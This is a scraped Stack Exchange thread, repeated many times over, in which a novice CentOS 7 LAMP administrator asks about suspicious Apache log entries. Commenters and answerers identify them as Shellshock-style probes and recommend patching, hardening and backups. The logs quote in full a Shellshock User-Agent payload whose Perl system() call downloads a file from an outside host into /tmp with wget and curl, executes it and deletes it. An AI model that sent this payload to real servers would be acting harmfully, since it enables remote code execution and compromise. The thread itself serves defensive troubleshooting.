Should I be concerned about hacking attempts via wget on a CentOS/LAMP-based web server?Apache log : hacking...
SSH "lag" in LAN on some machines, mixed distros
Can I ask the recruiters in my resume to put the reason why I am rejected?
Why does Kotter return in Welcome Back Kotter
What is the PIE reconstruction for word-initial alpha with rough breathing?
How to draw the figure with four pentagons?
Etiquette around loan refinance - decision is going to cost first broker a lot of money
Forgetting the musical notes while performing in concert
I Accidentally Deleted a Stock Terminal Theme
Assassin's bullet with mercury
Why is consensus so controversial in Britain?
A reference to a well-known characterization of scattered compact spaces
What is the intuition behind short exact sequences of groups; in particular, what is the intuition behind group extensions?
How do I write bicross product symbols in latex?
How to model explosives?
Do I have a twin with permutated remainders?
How can I tell someone that I want to be his or her friend?
Can a rocket refuel on Mars from water?
Can a virus destroy the BIOS of a modern computer?
90's TV series where a boy goes to another dimension through portal near power lines
How can I make my BBEG immortal short of making them a Lich or Vampire?
What killed these X2 caps?
Where does SFDX store details about scratch orgs?
RG-213 Cable with electric strained wire as metallic shield of Coaxial cable
What's the difference between 'rename' and 'mv'?
Should I be concerned about hacking attempts via wget on a CentOS/LAMP-based web server?
Apache log : hacking attempts ? How to fight against?Website updating from git (over ssh)Making home based web serverCentOS 5.8 server, installed Web Server vs yum install httpdCentOS 6 - iptables preventing web access via port 80I created Cron but I get errors that don't really understandFailing to update kernelWget - Download all images from web serverListing the Files in a Web Page Directory via WgetRunning Citadel Email on Raspbian ErrorsCentos 6 server is locked, cannot access via putty and cannot pingHow to set PHP timezone for cloud based web server distributed to different geographic regions?
.everyoneloves__top-leaderboard:empty,.everyoneloves__mid-leaderboard:empty,.everyoneloves__bot-mid-leaderboard:empty{ height:90px;width:728px;box-sizing:border-box;
}
This is a bit confusing, by the way I’m not a system administrator and only know a little bit about handling a Linux.
I’m running a LAMP-based website and hosting it on Digital Ocean. The server is CentOS 7 and I installed a few security tools like like Fail2ban. I frequently check the error logs and request logs, just today I saw a few disturbing requests; examples below.
My question is, does the hacker is trying to plant the virus file name "a2.png" to my /tmp folder? and does the hacker success planting it?
How should I know if the virus is now running in my server?
So far I can’t see that the file name exist in my tmp folder. What security measurement or server hardening should I install? And proper configuration of the apache? I only used the standard config of apache when I install the LAMP.
The website I’m handling is on virtual host and I’m using a framework to make it more secure. I’m not just sure If I’m on the right track securing my web server, I only installed Fail2ban for the logged-in attempt.
Error Log Examples
[Tue Aug 25 09:48:39.688528 2015] [core:error] [pid 24312] [client
64.15.155.177:33663] AH00126: Invalid URI in request GET HTTP/1.1 HTTP/1.1
[Tue Aug 25 09:48:40.877570 2015] [cgi:error] [pid 24306] [client
64.15.155.177:35398] script not found or unable to stat: /var/www/cgi-bin/report.cgi
[Tue Aug 25 09:48:41.042423 2015] [cgi:error] [pid 24331] [client
64.15.155.177:35687] script not found or unable to stat: /var/www/cgi-bin/webmap.cgi
Request Log Examples
64.15.155.177 - - [25/Aug/2015:09:48:39 -0400] "GET HTTP/1.1 HTTP/1.1" 400 226 "-" "() { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*");'"
64.15.155.177 - - [25/Aug/2015:09:48:39 -0400] "GET / HTTP/1.1" 301 234 "-" "() { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*");'"
64.15.155.177 - - [25/Aug/2015:09:48:40 -0400] "GET /main.cgi HTTP/1.1" 301 242 "-" "() { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*");'"
64.15.155.177 - - [25/Aug/2015:09:48:40 -0400] "GET /info.cgi HTTP/1.1" 301 242 "-" "() { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*");'"
64.15.155.177 - - [25/Aug/2015:09:48:40 -0400] "GET /index.cgi HTTP/1.1" 301 243 "-" "() { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*");'"
64.15.155.177 - - [25/Aug/2015:09:48:40 -0400] "GET /admin.cgi HTTP/1.1" 301 243 "-" "() { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*");'"
121.54.44.93 - - [25/Aug/2015:09:48:39 -0400] "GET / HTTP/1.1" 200 3785 "-" "Mozilla/5.0 (Linux; Android 4.4.2; en-ph; SAMSUNG SM-G7102 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Mobile Safari/537.36"
64.15.155.177 - - [25/Aug/2015:09:48:42 -0400] "GET /cgi-bin/register.cgi HTTP/1.1" 404 218 "-" "() { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*");'"
64.15.155.177 - - [25/Aug/2015:09:48:42 -0400] "GET /cgi-bin/download.cgi HTTP/1.1" 404 218 "-" "() { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*");'"
linux apache-http-server wget centos-7
edited Aug 30 '15 at 4:11
JakeGould
32.7k10100142
asked Aug 26 '15 at 8:12
angelitoangelito
212
add a comment |
This is a bit confusing, by the way I’m not a system administrator and only know a little bit about handling a Linux.
I’m running a LAMP-based website and hosting it on Digital Ocean. The server is CentOS 7 and I installed a few security tools like like Fail2ban. I frequently check the error logs and request logs, just today I saw a few disturbing requests; examples below.
My question is, does the hacker is trying to plant the virus file name "a2.png" to my /tmp folder? and does the hacker success planting it?
How should I know if the virus is now running in my server?
So far I can’t see that the file name exist in my tmp folder. What security measurement or server hardening should I install? And proper configuration of the apache? I only used the standard config of apache when I install the LAMP.
The website I’m handling is on virtual host and I’m using a framework to make it more secure. I’m not just sure If I’m on the right track securing my web server, I only installed Fail2ban for the logged-in attempt.
Error Log Examples
[Tue Aug 25 09:48:39.688528 2015] [core:error] [pid 24312] [client
64.15.155.177:33663] AH00126: Invalid URI in request GET HTTP/1.1 HTTP/1.1
[Tue Aug 25 09:48:40.877570 2015] [cgi:error] [pid 24306] [client
64.15.155.177:35398] script not found or unable to stat: /var/www/cgi-bin/report.cgi
[Tue Aug 25 09:48:41.042423 2015] [cgi:error] [pid 24331] [client
64.15.155.177:35687] script not found or unable to stat: /var/www/cgi-bin/webmap.cgi
Request Log Examples
64.15.155.177 - - [25/Aug/2015:09:48:39 -0400] "GET HTTP/1.1 HTTP/1.1" 400 226 "-" "() { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*");'"
64.15.155.177 - - [25/Aug/2015:09:48:39 -0400] "GET / HTTP/1.1" 301 234 "-" "() { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*");'"
64.15.155.177 - - [25/Aug/2015:09:48:40 -0400] "GET /main.cgi HTTP/1.1" 301 242 "-" "() { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*");'"
64.15.155.177 - - [25/Aug/2015:09:48:40 -0400] "GET /info.cgi HTTP/1.1" 301 242 "-" "() { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*");'"
64.15.155.177 - - [25/Aug/2015:09:48:40 -0400] "GET /index.cgi HTTP/1.1" 301 243 "-" "() { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*");'"
64.15.155.177 - - [25/Aug/2015:09:48:40 -0400] "GET /admin.cgi HTTP/1.1" 301 243 "-" "() { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*");'"
121.54.44.93 - - [25/Aug/2015:09:48:39 -0400] "GET / HTTP/1.1" 200 3785 "-" "Mozilla/5.0 (Linux; Android 4.4.2; en-ph; SAMSUNG SM-G7102 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Mobile Safari/537.36"
64.15.155.177 - - [25/Aug/2015:09:48:42 -0400] "GET /cgi-bin/register.cgi HTTP/1.1" 404 218 "-" "() { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*");'"
64.15.155.177 - - [25/Aug/2015:09:48:42 -0400] "GET /cgi-bin/download.cgi HTTP/1.1" 404 218 "-" "() { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*");'"
linux apache-http-server wget centos-7
edited Aug 30 '15 at 4:11
JakeGould
32.7k10100142
asked Aug 26 '15 at 8:12
angelitoangelito
212
I had the EXACT same thing happen to my server at the same time. From my brief googling it looks somewhat similar to a shellshock attack. Make sure your system is patched. If anyone has any further info, it would be appreciated.
– user488988
Aug 27 '15 at 5:33
4
The real question is: If you have no experience, why not use a regular shared hosting plan?
– Daniel B
Aug 27 '15 at 5:47
The same IP was found attempting to hack into our systems but in a somewhat different way. We've blacklisted them and contacted their host. Over the last 5 days or so it looks like there has been some other reports on that IP.
– user490119
Aug 30 '15 at 3:19
Additionally, targeting one IP address implies that the problem of bots probing websites goes away if you simply block one address. When the reality is that IP might be blocked until the botnet decide to probe using another node/IP address. The days of simply blocking an IP address and calling it a day ended like 15+ years ago. Hardening, heuristic-based blocking and a good data recovery plan are the way to go.
– JakeGould
Aug 30 '15 at 4:49
iWeb hosting service out of Quebec, Canada. Whole netblock of addresses assigned to a datacenter to block if they decide to change it. It's like blocking an attack generated out of an Amazon Web Services EC2 VPS.
– Fiasco Labs
Aug 30 '15 at 5:10
add a comment |
This is a bit confusing, by the way I’m not a system administrator and only know a little bit about handling a Linux.
I’m running a LAMP-based website and hosting it on Digital Ocean. The server is CentOS 7 and I installed a few security tools like like Fail2ban. I frequently check the error logs and request logs, just today I saw a few disturbing requests; examples below.
My question is, does the hacker is trying to plant the virus file name "a2.png" to my /tmp folder? and does the hacker success planting it?
How should I know if the virus is now running in my server?
So far I can’t see that the file name exist in my tmp folder. What security measurement or server hardening should I install? And proper configuration of the apache? I only used the standard config of apache when I install the LAMP.
The website I’m handling is on virtual host and I’m using a framework to make it more secure. I’m not just sure If I’m on the right track securing my web server, I only installed Fail2ban for the logged-in attempt.
Error Log Examples
[Tue Aug 25 09:48:39.688528 2015] [core:error] [pid 24312] [client
64.15.155.177:33663] AH00126: Invalid URI in request GET HTTP/1.1 HTTP/1.1
[Tue Aug 25 09:48:40.877570 2015] [cgi:error] [pid 24306] [client
64.15.155.177:35398] script not found or unable to stat: /var/www/cgi-bin/report.cgi
[Tue Aug 25 09:48:41.042423 2015] [cgi:error] [pid 24331] [client
64.15.155.177:35687] script not found or unable to stat: /var/www/cgi-bin/webmap.cgi
Request Log Examples
64.15.155.177 - - [25/Aug/2015:09:48:39 -0400] "GET HTTP/1.1 HTTP/1.1" 400 226 "-" "() { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*");'"
64.15.155.177 - - [25/Aug/2015:09:48:39 -0400] "GET / HTTP/1.1" 301 234 "-" "() { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*");'"
64.15.155.177 - - [25/Aug/2015:09:48:40 -0400] "GET /main.cgi HTTP/1.1" 301 242 "-" "() { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*");'"
64.15.155.177 - - [25/Aug/2015:09:48:40 -0400] "GET /info.cgi HTTP/1.1" 301 242 "-" "() { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*");'"
64.15.155.177 - - [25/Aug/2015:09:48:40 -0400] "GET /index.cgi HTTP/1.1" 301 243 "-" "() { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*");'"
64.15.155.177 - - [25/Aug/2015:09:48:40 -0400] "GET /admin.cgi HTTP/1.1" 301 243 "-" "() { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*");'"
121.54.44.93 - - [25/Aug/2015:09:48:39 -0400] "GET / HTTP/1.1" 200 3785 "-" "Mozilla/5.0 (Linux; Android 4.4.2; en-ph; SAMSUNG SM-G7102 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Mobile Safari/537.36"
64.15.155.177 - - [25/Aug/2015:09:48:42 -0400] "GET /cgi-bin/register.cgi HTTP/1.1" 404 218 "-" "() { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*");'"
64.15.155.177 - - [25/Aug/2015:09:48:42 -0400] "GET /cgi-bin/download.cgi HTTP/1.1" 404 218 "-" "() { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*");'"
linux apache-http-server wget centos-7
edited Aug 30 '15 at 4:11
JakeGould
32.7k10100142
asked Aug 26 '15 at 8:12
angelitoangelito
212
This is a bit confusing, by the way I’m not a system administrator and only know a little bit about handling a Linux.
I’m running a LAMP-based website and hosting it on Digital Ocean. The server is CentOS 7 and I installed a few security tools like like Fail2ban. I frequently check the error logs and request logs, just today I saw a few disturbing requests; examples below.
My question is, does the hacker is trying to plant the virus file name "a2.png" to my /tmp folder? and does the hacker success planting it?
How should I know if the virus is now running in my server?
So far I can’t see that the file name exist in my tmp folder. What security measurement or server hardening should I install? And proper configuration of the apache? I only used the standard config of apache when I install the LAMP.
The website I’m handling is on virtual host and I’m using a framework to make it more secure. I’m not just sure If I’m on the right track securing my web server, I only installed Fail2ban for the logged-in attempt.
Error Log Examples
[Tue Aug 25 09:48:39.688528 2015] [core:error] [pid 24312] [client
64.15.155.177:33663] AH00126: Invalid URI in request GET HTTP/1.1 HTTP/1.1
[Tue Aug 25 09:48:40.877570 2015] [cgi:error] [pid 24306] [client
64.15.155.177:35398] script not found or unable to stat: /var/www/cgi-bin/report.cgi
[Tue Aug 25 09:48:41.042423 2015] [cgi:error] [pid 24331] [client
64.15.155.177:35687] script not found or unable to stat: /var/www/cgi-bin/webmap.cgi
Request Log Examples
64.15.155.177 - - [25/Aug/2015:09:48:39 -0400] "GET HTTP/1.1 HTTP/1.1" 400 226 "-" "() { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*");'"
64.15.155.177 - - [25/Aug/2015:09:48:39 -0400] "GET / HTTP/1.1" 301 234 "-" "() { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*");'"
64.15.155.177 - - [25/Aug/2015:09:48:40 -0400] "GET /main.cgi HTTP/1.1" 301 242 "-" "() { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*");'"
64.15.155.177 - - [25/Aug/2015:09:48:40 -0400] "GET /info.cgi HTTP/1.1" 301 242 "-" "() { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*");'"
64.15.155.177 - - [25/Aug/2015:09:48:40 -0400] "GET /index.cgi HTTP/1.1" 301 243 "-" "() { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*");'"
64.15.155.177 - - [25/Aug/2015:09:48:40 -0400] "GET /admin.cgi HTTP/1.1" 301 243 "-" "() { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*");'"
121.54.44.93 - - [25/Aug/2015:09:48:39 -0400] "GET / HTTP/1.1" 200 3785 "-" "Mozilla/5.0 (Linux; Android 4.4.2; en-ph; SAMSUNG SM-G7102 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Mobile Safari/537.36"
64.15.155.177 - - [25/Aug/2015:09:48:42 -0400] "GET /cgi-bin/register.cgi HTTP/1.1" 404 218 "-" "() { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*");'"
64.15.155.177 - - [25/Aug/2015:09:48:42 -0400] "GET /cgi-bin/download.cgi HTTP/1.1" 404 218 "-" "() { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*");'"
linux apache-http-server wget centos-7
linux apache-http-server wget centos-7
edited Aug 30 '15 at 4:11
JakeGould
32.7k10100142
asked Aug 26 '15 at 8:12
angelitoangelito
212
edited Aug 30 '15 at 4:11
JakeGould
32.7k10100142
asked Aug 26 '15 at 8:12
angelitoangelito
212
edited Aug 30 '15 at 4:11
JakeGould
32.7k10100142
edited Aug 30 '15 at 4:11
JakeGould
32.7k10100142
edited Aug 30 '15 at 4:11
JakeGould
32.7k10100142
32.7k10100142
asked Aug 26 '15 at 8:12
angelitoangelito
212
asked Aug 26 '15 at 8:12
angelitoangelito
212
asked Aug 26 '15 at 8:12
angelitoangelito
212
212
I had the EXACT same thing happen to my server at the same time. From my brief googling it looks somewhat similar to a shellshock attack. Make sure your system is patched. If anyone has any further info, it would be appreciated.
– user488988
Aug 27 '15 at 5:33
4
The real question is: If you have no experience, why not use a regular shared hosting plan?
– Daniel B
Aug 27 '15 at 5:47
The same IP was found attempting to hack into our systems but in a somewhat different way. We've blacklisted them and contacted their host. Over the last 5 days or so it looks like there has been some other reports on that IP.
– user490119
Aug 30 '15 at 3:19
Additionally, targeting one IP address implies that the problem of bots probing websites goes away if you simply block one address. When the reality is that IP might be blocked until the botnet decide to probe using another node/IP address. The days of simply blocking an IP address and calling it a day ended like 15+ years ago. Hardening, heuristic-based blocking and a good data recovery plan are the way to go.
– JakeGould
Aug 30 '15 at 4:49
iWeb hosting service out of Quebec, Canada. Whole netblock of addresses assigned to a datacenter to block if they decide to change it. It's like blocking an attack generated out of an Amazon Web Services EC2 VPS.
– Fiasco Labs
Aug 30 '15 at 5:10
add a comment |
I had the EXACT same thing happen to my server at the same time. From my brief googling it looks somewhat similar to a shellshock attack. Make sure your system is patched. If anyone has any further info, it would be appreciated.
– user488988
Aug 27 '15 at 5:33
4
The real question is: If you have no experience, why not use a regular shared hosting plan?
– Daniel B
Aug 27 '15 at 5:47
The same IP was found attempting to hack into our systems but in a somewhat different way. We've blacklisted them and contacted their host. Over the last 5 days or so it looks like there has been some other reports on that IP.
– user490119
Aug 30 '15 at 3:19
Additionally, targeting one IP address implies that the problem of bots probing websites goes away if you simply block one address. When the reality is that IP might be blocked until the botnet decide to probe using another node/IP address. The days of simply blocking an IP address and calling it a day ended like 15+ years ago. Hardening, heuristic-based blocking and a good data recovery plan are the way to go.
– JakeGould
Aug 30 '15 at 4:49
iWeb hosting service out of Quebec, Canada. Whole netblock of addresses assigned to a datacenter to block if they decide to change it. It's like blocking an attack generated out of an Amazon Web Services EC2 VPS.
– Fiasco Labs
Aug 30 '15 at 5:10
I had the EXACT same thing happen to my server at the same time. From my brief googling it looks somewhat similar to a shellshock attack. Make sure your system is patched. If anyone has any further info, it would be appreciated.
– user488988
Aug 27 '15 at 5:33
I had the EXACT same thing happen to my server at the same time. From my brief googling it looks somewhat similar to a shellshock attack. Make sure your system is patched. If anyone has any further info, it would be appreciated.
– user488988
Aug 27 '15 at 5:33
4
4
The real question is: If you have no experience, why not use a regular shared hosting plan?
– Daniel B
Aug 27 '15 at 5:47
The real question is: If you have no experience, why not use a regular shared hosting plan?
– Daniel B
Aug 27 '15 at 5:47
The same IP was found attempting to hack into our systems but in a somewhat different way. We've blacklisted them and contacted their host. Over the last 5 days or so it looks like there has been some other reports on that IP.
– user490119
Aug 30 '15 at 3:19
The same IP was found attempting to hack into our systems but in a somewhat different way. We've blacklisted them and contacted their host. Over the last 5 days or so it looks like there has been some other reports on that IP.
– user490119
Aug 30 '15 at 3:19
Additionally, targeting one IP address implies that the problem of bots probing websites goes away if you simply block one address. When the reality is that IP might be blocked until the botnet decide to probe using another node/IP address. The days of simply blocking an IP address and calling it a day ended like 15+ years ago. Hardening, heuristic-based blocking and a good data recovery plan are the way to go.
– JakeGould
Aug 30 '15 at 4:49
Additionally, targeting one IP address implies that the problem of bots probing websites goes away if you simply block one address. When the reality is that IP might be blocked until the botnet decide to probe using another node/IP address. The days of simply blocking an IP address and calling it a day ended like 15+ years ago. Hardening, heuristic-based blocking and a good data recovery plan are the way to go.
– JakeGould
Aug 30 '15 at 4:49
iWeb hosting service out of Quebec, Canada. Whole netblock of addresses assigned to a datacenter to block if they decide to change it. It's like blocking an attack generated out of an Amazon Web Services EC2 VPS.
– Fiasco Labs
Aug 30 '15 at 5:10
iWeb hosting service out of Quebec, Canada. Whole netblock of addresses assigned to a datacenter to block if they decide to change it. It's like blocking an attack generated out of an Amazon Web Services EC2 VPS.
– Fiasco Labs
Aug 30 '15 at 5:10
add a comment |
2 Answers
2
active
oldest
votes
As Fiasco Labs points out in their answer, these type of log entries are a dime-a-dozen. But as a systems administrator with a deep history managing and protection LAMP-based web servers, this is not an attack as much a scripted “probe” of your system by someone somewhere. These probes/scans of a system are done to see what—if any—servers out there are vulnerable; not just your servers. In general this is the equivalent of the “war dialing” that was fairly commonplace in the 1980s/1990s days of system hacking via acoustic modem; scan a list of systems, see what systems have “flaws” and then see what you can do with those supposed flaws.
Should you be panicked about this? Not at all. Any and every web server on the Internet is being constantly probed. I manage a few Ubuntu Linux web servers and I am 100% positive if I were to check my logs right now, tomorrow, a day from now, etc… I would see entries similar to what you are seeing. But I am not losing sleep over this at all. The reality is if your core OS is properly patched and the framework you are using is patched and up to date, you are in good shape.
Using a tool like Fail2Ban is not a bad idea, but I consider it a bit of overkill if you ask me. The reason being that even with a tool like Fail2Ban or even ModSecurity, a clever bot might still get through. Which is why my best advice to any systems administrator is to harden their servers and have a way to easily recover from a systems compromise.
Harden Your Server and Your Codebase
What I consider best security practice is hardening you LAMP server setup and ensuring our PHP code is solid. This answer on the security Stack Exchange site is a good starting point in understanding what “hardening” means, but honestly if you are not a systems administrator much of this might be over your head.
So I would recommend that unless you are truly up to the task of learning how to be a Linux systems administrator, you might be better off using some shared hosting provider somewhere. That way their admins use their skills to worry about this stuff and you can concentrate on running/coding the website.
That said, even with a shared hosting setup, you are not off of the hook. Even if you are using a well-regarding PHP framework, you need to stay on top of patching that PHP framework pretty much whenever an update is released. And as far as your core code base, you should be sure to not cut corners on basic security practice in how you code. You basically should learn how to sanitize any/all input your site receives and how to properly setup the site so even if it fails, it doesn’t do so in a way that is a disaster.
Backups and Disaster Recovery
And in my mind that means backups, backups, backups as well as more backups. You can never control server compromise, but data/system recovery is always in your control. Which all means you need to have some kind of small-scale “disaster recovery plan” in place to restore your site.
Which means, be sure to backup your core codebase so if it is ever compromised, you can easily redeploy clean code without much effort. To that end I would highly recommend you use a source code management tool like git for your version tracking as well as setting up a GitHub repository for remote storage. Also, learn how to use Capistrano with PHP to deploy code; I have an answer that addresses how to do this over here.
Ditto with your MySQL database; depending on size/scale have backups available. I like to have MySQL backups on small-to-medium sized sites run every 3-4 hours. That way the worst that might happen if a site is hacked is the database is at the most 3-4 hours stale; a stale database within the same day is better than a wrecked database with no backup at all.
edited Mar 20 '17 at 10:17
Community♦
1
answered Aug 30 '15 at 4:32
JakeGouldJakeGould
32.7k10100142
add a comment |
Scripted wget attack looking for common vulnerabilities. Keep your server software up to date and most of them won't work unless they're zero-day.
You will find these are a dime a dozen on web servers, your only defense is to never allow your server to run in an unpatched state.
Read up on Centos security patching and spend more time running apt-get/yum/rpm (whatever's the package manager) to get the latest security updates.
edited Apr 13 '17 at 12:14
Community♦
1
answered Aug 27 '15 at 5:57
Fiasco LabsFiasco Labs
6,27011830
Fun fact: OP's attacker has their server in Canada. OP could manually block IP with IPtables and file a complaint with the Canadian govt if it got super personal.
– Michael Bailey
Aug 27 '15 at 7:34
1
This type of attack not only targets vulnerabilities, but also configuration mistakes. That means even the most up-to-date system could be easily hacked.
– Daniel B
Aug 27 '15 at 8:38
1
@MichaelBailey Manually blocking one IP address is like playing a game of “Whac-A-Mole” when it comes to server security. Also, a report of the IP address might lead to nothing since the IP address could be a compromised machine that is being used a part of a bot-net. Meaning that IP address could just be some honest person’s infected home PC. Better to use Fail2ban or ModSecurity to protect servers heuristically/behaviorally rather than targetting one IP as the supposed “bad guy.”
– JakeGould
Aug 30 '15 at 4:59
